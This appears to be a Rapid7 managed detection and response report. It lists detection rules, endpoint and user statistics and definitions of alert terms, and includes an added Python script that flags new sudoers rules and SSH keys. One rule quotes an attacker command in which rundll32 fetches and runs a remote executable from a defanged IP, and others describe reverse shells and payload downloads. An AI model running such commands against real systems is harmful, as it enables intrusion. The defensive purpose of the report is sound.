Palo Alto Networks Cortex XDR - HTTP Cross-Site Scripting Vulnerability HTTP Cross-Site Scripting Vulnerability
Palo Alto Networks Cortex XDR - Image file execution options (IFEO) registry key set to execute a shell or scripting engine process Image file execution options (IFEO) registry key set to execute a shell or scripting engine process
Palo Alto Networks Cortex XDR - Imagemagick Arbitrary File Read Vulnerability Imagemagick Arbitrary File Read Vulnerability
Palo Alto Networks Cortex XDR - LOLBIN spawned by an Office executable connected to a rare external host LOLBIN spawned by an Office executable connected to a rare external host
Palo Alto Networks Cortex XDR - Manipulation of the MonitorProcess Registry key Manipulation of the MonitorProcess Registry key
Palo Alto Networks Cortex XDR - Microsoft IIS 5.0 Form_JScript.asp XSS Vulnerability Microsoft IIS 5.0 Form_JScript.asp XSS Vulnerability
Palo Alto Networks Cortex XDR - Microsoft IIS ServerVariables_JScript.asp Information Disclosure Microsoft IIS ServerVariables_JScript.asp Information Disclosure
Palo Alto Networks Cortex XDR - Microsoft IIS Translate F Header Source Disclosure Vulnerability Microsoft IIS Translate F Header Source Disclosure Vulnerability
Palo Alto Networks Cortex XDR - Microsoft PE File Microsoft PE File
Palo Alto Networks Cortex XDR - Microsoft Windows GDI Information Disclosure Vulnerability Microsoft Windows GDI Information Disclosure Vulnerability
Palo Alto Networks Cortex XDR - Microsoft Windows Remote Code Execution Vulnerability Microsoft Windows Remote Code Execution Vulnerability
Palo Alto Networks Cortex XDR - Multiple Vendors Parameters Hash Collision Denial-Of-Service Vulnerability Multiple Vendors Parameters Hash Collision Denial-Of-Service Vulnerability
Palo Alto Networks Cortex XDR - new:amplreq.com new:amplreq.com
Palo Alto Networks Cortex XDR - OpenVAS Vulnerability Scanner Detection OpenVAS Vulnerability Scanner Detection
Palo Alto Networks Cortex XDR - Oracle Web Cache HTTP Request Parsing Heap Overflow Vulnerability Oracle Web Cache HTTP Request Parsing Heap Overflow Vulnerability
Palo Alto Networks Cortex XDR - Oracle WebLogic Server Side Request Forgery Vulnerability Oracle WebLogic Server Side Request Forgery Vulnerability
Palo Alto Networks Cortex XDR - PCCS Mysql Database Admin Tool Username and Password Disclosure Vulnerability PCCS Mysql Database Admin Tool Username and Password Disclosure Vulnerability
Palo Alto Networks Cortex XDR - PHP-Fusion Downloads.php Command Injection Vulnerability PHP-Fusion Downloads.php Command Injection Vulnerability
Palo Alto Networks Cortex XDR - Possible Host Scan detected Possible Host Scan detected
Palo Alto Networks Cortex XDR - Rapid7 Alert on Malicious hash Rapid7 Alert on Malicious hash
Palo Alto Networks Cortex XDR - Remote PsExec-like command execution from an unsigned non-standard PsExec service Remote PsExec-like command execution from an unsigned non-standard PsExec service
Palo Alto Networks Cortex XDR - Reverse Shell Reverse Shell - 2430218738
Palo Alto Networks Cortex XDR - Signature Forgery Signature Forgery - 2953588967
Palo Alto Networks Cortex XDR - Suspicious Binary incident - Suspicious Binary incident
Palo Alto Networks Cortex XDR - Suspicious Remote Domain Account Enumeration ‘Suspicious Remote domain account enumeration’ generated by XDR Analytics detected on host p-adsvr02 involving user ‘premiumtrust’ and ’8745
Palo Alto Networks Cortex XDR - ‘Suspicious Remote domain account enumeration’ generated by XDR Analytics detected on host p-adsvr02 involving user ‘premiumtrust42684137’ ‘Suspicious Remote domain account enumeration’ generated by XDR Analytics detected on host p-adsvr02 involving user ‘premiumtrust42684137’
Palo Alto Networks Cortex XDR - User added to a Windows privileged group User added to a Windows privileged group
Palo Alto Networks Cortex XDR - VBScript File VBScript File
Suspicious Authentication - 1984 ehf This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - Alviva Holding Limited This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - An Unenrolled Duo User Authenticated From a Low Cost VPN Provider This detection identifies the ingress authentication of an unenrolled user using a low-cost VPN. An unenrolled user is a user with only a bypass code configured and no other 2FA device configured. When adequate settings and policies are not in place to deny access to unenrolled users, threat actors can leverage the lack of security controls for authentication.
Suspicious Authentication - Authentication of Account “ils_anonymous_user” From a Low Cost VPN This detection identifies successful ingress authentication from the account “ils_anonymous_user” from a low-cost VPN. “ils_anonymous_user” is a password-less account that is created by web servers by default to authenticate to resources within IIS. Threat actors have been observed leveraging this account on publicly facing servers to move laterally within systems and drop malware.
Suspicious Authentication - Chang Way Technologies This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - Dedipath This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - Delis LLC This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - Dm Auto Eood This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - EGIHosting This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - GleSYS Internet Services AB This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - Green Floid This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - HolyHosting This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - HostRoyale Technologies This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - Krez 999 Eood This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - L&L Investment Ltd This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - OsetecNET This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - Proton66 OOO This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - Shock Hosting This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - Stark Industries Solutions This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - Zomro This detection identifies successful authentications from low-cost VPN providers.
Suspicious Process - Binary File Signed With Stolen AnyDesk Certificate Executed This detection identifies the execution of a binary file that was signed with a certificate stolen from the legitimate software AnyDesk. Malicious actors use legitimate signing certificates to sign their malicious code so that it appears to be a trusted application.
Suspicious Process - CMD File Spawns Wscript With URL In Command Line This detection identifies ‘*.cmd’ files spawning Wscript with a URL in the command line. This may be done by malicious actors attempting to download a second-stage payload.
Suspicious Process - Execution Of File Hosted On A WebDav Server Using Rundll32.exe This detection identifies the execution of Rundll32, executing the DavSetCookie function of davclnt.dll, the Windows WebDAV Client library, which can be used by a malicious actor to execute a file hosted in a remote location (Webdav server).
Example Command:
rundll32.exe C:32.dll,DavSetCookie 167.172.130[.] http://167.172.130[.]12/documentos235/seca964/inscripcion528.exe
Suspicious Process - ManageEngine ToolsIQ.exe Spawning a Shell This detection identifies ToolsIQ.exe spawning cmd.exe or powershell.exe. ToolsIQ.exe is a component of ManageEngine’s UEMS solution and is part of its remote access functionality. After successful exploitation, malicious actors have been observed downloading and installing the UEMS tool on the compromised machine and using ToolsIQ to connect to and execute tasks on other machines on the network.
Suspicious Process - Qlik Sense Scheduler Spawning a Shell This detection identifies Qlik Sense’s Scheduler program spawning cmd.exe or powershell.exe. After successful exploitation of the known Qlik Sense vulnerabilities (CVE-2023-41265 or CVE-2023-41266), malicious actors use the Scheduler to execute arbitrary commands.
Suspicious Process - SSH Reverse Shell Tunneling This detection identifies the process ‘ssh.exe’ executing with command lines that indicate a reverse shell tunnel established with a remote host. Malicious actors have been observed abusing this to access compromised machines behind a firewall or in a private network from their remote host.
Suspicious Process - Use of Curl to Download a File to a Temp Directory Without SSL Verification This detection identifies the use of the curl and Wget utilities to download a malicious payload from an external URL and save it in a temp directory. Malicious actors have been observed using ‘curl’ and Wget to download second-stage payloads from external URLs.
Suspicious Web Request - Possible Qlik Sense CVE-2023-41266 Exploitation This detection identifies a possible exploitation of Qlik Sense’s known path traversal vulnerability CVE-2023-41266.
Suspicious Web Requests - Possible ConnectWise ScreenConnect Exploitation On February 19, 2024, ConnectWise disclosed two vulnerabilities in their ScreenConnect remote access software. Both vulnerabilities affect ScreenConnect versions 23.9.7 and earlier. This alert triggers on the bypass path observed in a publicly released exploit.

Rules With New Suppressions

  • Suspicious Process - Execution From Root Of Users

Your Environment

Endpoints

The Insight Agent is deployed on 1,650 of the 1,700 endpoints that your organization asked the MDR team to monitor. We encourage you to deploy the Insight Agent on the remaining endpoints so we can provide forensic analysis, hunting activities, and alert recommendations for all 1,700 planned endpoints.

You have a total of 1,700 endpoint licenses. If the endpoint data provided in this report is inconsistent with planned deployment targets, contact your Customer Advisor.

Endpoint Agents

97

Endpoint Agents

1,650

Endpoint Agents

1,700

Endpoint Agents

1,700

Users

This section provides the total number of administrators identified in your environment.

Administrators

20

Non-Expiring Passwords

Non-expiring passwords are at high risk of credential theft and reuse. Malicious actors could reuse these passwords on third-party sites. Rapid7 recommends limiting the use of non-expiring passwords. Implementing user password rotation reduces the risk of unauthorized access from harvested credentials.

Non Expiring

14

Service Accounts

0

Users with Non-Expiring Passwords

IDR Identified Administrators

The following users were observed performing administrator-level actions in your environment. Rapid7 recommends reconciling this list with the approved administrators for your organization.

Applications

This section provides visibility into various categories of software observed being executed in the Company Name’s environment. Rapid7 recommends reviewing the following applications to determine if they are authorized and approved according to the Company Name’s acceptable use policy.

Potentially Unwanted Programs (PUPs)

PUPs are often non-malicious in nature but may be admin tools, browser toolbars, and other types of software that serve no business need.

Rapid7 did not identify any potentially unwanted programs in the Company Name’s environment.

Remote Access Solutions

Remote access solutions can be used by threat actors to gain remote access to a system.

Rapid7 identified remote access software (Zoho Assist, Citrix Receiver, OpenVPN, VNC, TeamViewer, AnyDesk, SplashTop, Chrome Remote Desktop) installed on several systems in the Company Name’s environment. Rapid7 recommends reviewing the software’s presence on each system to determine whether it has a business need and whether the system owner is authorized to use the application.

Cloud Storage Solutions

Rapid7 identified cloud storage solutions (Microsoft OneDrive, Box.com, Egnyte, Google Drive, iCloud) installed on several systems in the Company Name’s environment.

Users may upload sensitive or proprietary data to non-approved cloud storage solutions. Rapid7 recommends ensuring that users follow corporate cloud storage usage policies by uninstalling unwanted software or blocking unapproved cloud storage network traffic.

Imposter Domain Names

Rapid7 identified multiple registered domains potentially designed to be imposters of the Company Name’s registered domains. Rapid7 recommends reviewing and blocking the identified domains, if they serve no business need.


Imposter Domain for companyname.com

Key Terms and Definitions

Managed Detection and Response Overview

When you use Rapid7 MDR services, your logs are collected and matched against curated rules. Each time an event matches certain rule criteria, an alert is sent to our MDR team, and they respond with an investigation. The following sections describe how Rapid7’s MDR team defines the priority, status, and disposition of alerts, and provide an overview of our incident reports.

Alert Priority

Rapid7 will prioritize alerts based on a combination of the likelihood of malicious activity and the potential impact of the detected activity.

Priority Description
Critical Activity occurred in your environment that was almost certainly a malicious event. Critical alerts require immediate response and are the highest priority for the MDR team.
High Activity occurred in your environment that was most likely a malicious event and should be prioritized for analyst review.
Medium Activity occurred in your environment that may be a malicious event and requires analyst review.
Low Activity occurred in your environment that is likely not malicious but still requires review by a Rapid7 MDR Analyst.

Incident Severity

Rapid7 determines the severity of an incident based on a number of factors, including:

  • Intent: Whether the threat appears to be targeted or opportunistic/automated, and the likely objectives of the attack
  • Scope: The number and criticality of systems and users impacted
  • Ongoing Activity: Whether the incident appears to have been fully contained
Severity | Incident Definition | Example Incident(s)
Low | A non-targeted, low-impact threat involving a small number of systems or users which is already contained by existing security controls | A non-targeted phishing attack with no evidence that the recipient(s) provided credentials
Medium | A non-targeted, low-impact threat impacting a small number of systems or users, but requiring additional actions from you to fully contain and eradicate the threat | Malware delivered via a non-targeted phishing attack that is only partially blocked on an endpoint
High | A high-risk or high-impact threat with no sign of active attacker activity | Historical evidence of compromise on a web server, with indications of prior lateral movement within the environment
Critical | A high-risk or high-impact threat with evidence of recent or ongoing attacker activity | Evidence of a compromised web server, along with ongoing command execution and lateral movement within the environment

Closed Alert Dispositions

Once an alert has been investigated, it is marked as Closed, and is assigned one of the following dispositions:

| Disposition | Description |
|---|---|
| Benign | This event was associated with non-malicious behaviors in the context of your environment and did not require additional validation from your organization to close. |
| Reported Benign | This event was reported to your organization and was confirmed as benign. For example, after further investigation, Rapid7 confirmed that a suspicious authorization or honeypot was benign. |
| Reported Malicious | The event represented by this alert was associated with malicious activity and was reported to your organization. Your organization confirmed that this event was unexpected behavior and further analysis indicated a compromise. The communication resulted in changes to your environment, such as password resets or reconfigured services. |
| Security Test | Rapid7 determined that this alert was related to security testing, and did not require customer validation to close. |
| Reported Security Test | Rapid7 determined that this alert was associated with alerts often generated by security testing, and confirmed with your organization. |
| Reported Unknown | Rapid7 reported this alert to your organization, but we did not complete an in-depth investigation. Your organization indicated that this event fulfilled a business use-case or that it was of no concern. |
| System Closed | Alerts that were closed automatically without further analyst review. This includes alerts that on their own do not indicate malicious activity, but are reviewed if they are related to a high fidelity alert. |
| False Positive | An alert was triggered that was not related to the rule logic. Rapid7 triaged the event, and submitted a tuning request to the intel team. |
| PUP | A potentially unwanted program (PUP) or potentially unwanted application (PUA) is software that a user may perceive as unwanted or unnecessary. Such software may use an implementation that can compromise privacy or weaken the computer’s security, but is not considered malicious. Companies often bundle a wanted program download with a wrapper application and may offer to install an unwanted application, in some cases without providing a clear opt-out method. For example, potentially unwanted programs can include software that displays intrusive advertising (adware), tracks the user’s Internet usage to sell information to advertisers (spyware), or injects its own advertising into web pages that a user looks at. Rapid7 does not typically report on PUPs unless analysis of the software leads Rapid7 to conclude that its function is malicious. |


Data Source Descriptions

| Artifact Type | Operating System | Description |
|---|---|---|
| Prefetch | Windows | Rapid7 acquires prefetch entries to identify historical execution of suspicious executables, DLLs, and output files. |
| Services | Windows | Windows services are often used by attackers to ensure that malware starts on a system if the system reboots. |
| Scheduled Tasks | Windows | Windows scheduled tasks are often used by attackers to execute code remotely and to maintain malware persistence. |
| Registry-Based Persistence | Windows | The Windows Registry contains dozens of configuration options for ensuring that code executes under various circumstances including system boot, user logon, or application launches. |
| Running Processes | Windows | Running process data can provide indications of malicious processes, including libraries loaded by processes, network connections from processes, and suspicious command-line arguments. |
| Current Services and Startup Items | Mac | Attackers often use Darwin/Mac services and startup items to establish persistence on a compromised host to ensure that malware starts at system reboot. |
| Crontab/Scheduled Tasks | Mac | Attackers can use crontabs/scheduled tasks to maintain persistence on a compromised host. |
| Running Processes | Mac | Running process data can provide indications of malicious processes, including libraries loaded by processes, network connections from processes, and suspicious command-line arguments. |
| Sudoers | Mac | Attackers can modify or abuse sudoer rules to allow privilege escalation by executing a given command as another user, such as “root.” |
| Suid Binaries | Mac | Attackers can utilize these binaries as a backdoor or for privilege escalation, as they are executed as the given username, which is often “root.” |
| Authorized Keys | Mac | Attackers can implement new keys that they are capable of generating once they compromise a user account on a system. This technique can allow the attacker to establish a backdoor for later use. |
| Kernel Extensions | Mac | Kernel extensions run at the operating system’s highest privilege, making them a target for attackers to try to implement persistence on a compromised host. |
| Crontab/Scheduled Tasks | Linux | Attackers can use crontabs/scheduled tasks to maintain persistence on a compromised host. |
| Running Processes | Linux | Running process data can provide indications of malicious processes, including libraries loaded by processes, network connections from processes, and suspicious command-line arguments. |
| Sudoers | Linux | Attackers can modify or abuse sudoer rules to allow privilege escalation by executing a given command as another user, such as “root.” |
| Suid Binaries | Linux | Attackers can utilize these binaries as a backdoor or for privilege escalation, as they are executed as the given username, which is often “root.” |
| Kernel Modules | Linux | Kernel modules run at the operating system’s highest privilege, making them a target for attackers to compromise and use for rootkits. |
| Authorized Keys | Linux | Attackers can implement new keys that they are capable of generating once they compromise a user account on a system. This technique can allow the attacker to establish a backdoor for later use. |
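As an added illustration (not Rapid7's collection or analysis code), the following compares two of the Linux artifacts in the table above, sudoers rules and authorized keys, against a known-good baseline and flags what was added. The sudoers and authorized_keys contents, including the key blobs, are constructed placeholders; it assumes the artifacts were already collected as plain text.

```python
import re

# Sudoers user specs such as "root ALL=(ALL:ALL) ALL" or "backup ALL=(root) NOPASSWD: ALL".
SUDO_RULE = re.compile(r"^(?P<who>\S+)\s+\S+\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*"
                       r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")
KEY_LINE = re.compile(r"(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d+)\s+(\S+)(?:\s+(.*))?")

def parse_sudoers(text):
    """Return (who, runas_user, tags, commands) per rule; Defaults, aliases and comments are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")):
            continue
        m = SUDO_RULE.match(line)
        if m:
            runas = (m.group("runas") or "root").split(":")[0] or "root"  # sudo runs as root unless told otherwise
            tags = tuple(t for t in m.group("tags").replace(" ", "").split(":") if t)
            rules.append((m.group("who"), runas, tags, m.group("cmds").strip()))
    return rules

def parse_authorized_keys(text):
    """Return (key_type, key_blob, comment) per key; per-key options such as command="..." are ignored."""
    keys = []
    for line in (l.strip() for l in text.splitlines()):
        m = KEY_LINE.search(line)
        if m and not line.startswith("#"):
            keys.append((m.group(1), m.group(2), (m.group(3) or "").strip()))
    return keys

def new_entries(baseline_text, current_text, parser):
    """Entries in the current collection that are absent from the known-good baseline."""
    return sorted(set(parser(current_text)) - set(parser(baseline_text)))

def report(baseline, current):
    """Findings for sudoers rules and authorized keys added since the baseline was taken."""
    findings = []
    for who, runas, tags, cmds in new_entries(baseline["sudoers"], current["sudoers"], parse_sudoers):
        # Any command as root, or any command without a password, is the escalation the table warns about.
        risky = runas in ("root", "ALL") and (cmds == "ALL" or "NOPASSWD" in tags)
        findings.append(f"sudoers: new rule for {who} as {runas}: {cmds}" + (" [unrestricted]" if risky else ""))
    for ktype, blob, comment in new_entries(baseline["authorized_keys"], current["authorized_keys"], parse_authorized_keys):
        findings.append(f"authorized_keys: new {ktype} key {blob[:16]}... ({comment or 'no comment'})")
    return findings

# Constructed samples: the key blobs are placeholders, not real keys.
BASELINE = {"sudoers": "Defaults env_reset\nroot ALL=(ALL:ALL) ALL\n%sudo ALL=(ALL:ALL) ALL\n",
            "authorized_keys": "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5PLACEHOLDERBASELINE alice@laptop\n"}
CURRENT = {"sudoers": BASELINE["sudoers"] + "backup ALL=(root) NOPASSWD: ALL  # not in baseline\n",
           "authorized_keys": BASELINE["authorized_keys"] + 'command="/bin/sh" ssh-rsa AAAAB3NzaC1yc2EPLACEHOLDERNEW\n'}
```

Calling `report(BASELINE, CURRENT)` returns one finding for the added NOPASSWD rule and one for the added key; an unchanged host produces an empty list.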


Incident Reports

An incident report is created when our MDR team responds to a confirmed malicious incident in your environment. This is a detailed report providing an overview of the incident, findings details, analysis, root cause, and recommended corrective actions to reduce the likelihood of recurrence and/or improve your ability to detect and respond to similar incidents in the future.


Threat Hunting

The MDR service relies on multiple methods of compromise detection within client environments. In addition to real-time alerting, MDR frequently performs targeted, threat intelligence-driven hunting by querying forensically relevant data available to Rapid7 Threat Hunters. If a hunt yields a positive identification of compromise, or potential for compromise, customers are notified immediately and provided with remediation and mitigation recommendations, followed by a full incident report within 24 hours of the conclusion of the investigation.


Endpoints

% Endpoints Covered - This represents both the overall percentage of endpoints in your organization that have Insight Agents deployed and the percentage of endpoints the MDR team is able to monitor. It is calculated using the total number of endpoints that your organization asked us to monitor, or “Planned Endpoints” in this report, and the actual number of monitored endpoints, which are referred to as “Monitored Endpoints” in this report. The number of Total Endpoint Licenses is not included as part of this percentage.

Monitored Endpoints - The number of endpoints with an Insight Agent installed, and as a result, the number of endpoints the MDR team is able to monitor.

Planned Endpoints - The total number of endpoints the MDR team expected to monitor based on information your organization provided to the MDR team. If the number of planned endpoints is greater than the number of monitored endpoints, there are still endpoints that the MDR team was asked to monitor but that do not yet have an Insight Agent installed. The Insight Agent must be installed on all endpoints that you want the MDR team to monitor.

Total Endpoint Licenses - This is the total number of licenses purchased by your organization, and specified in your contract. This may be higher than your Planned Endpoints based on your organization’s growth estimates and contingency plans.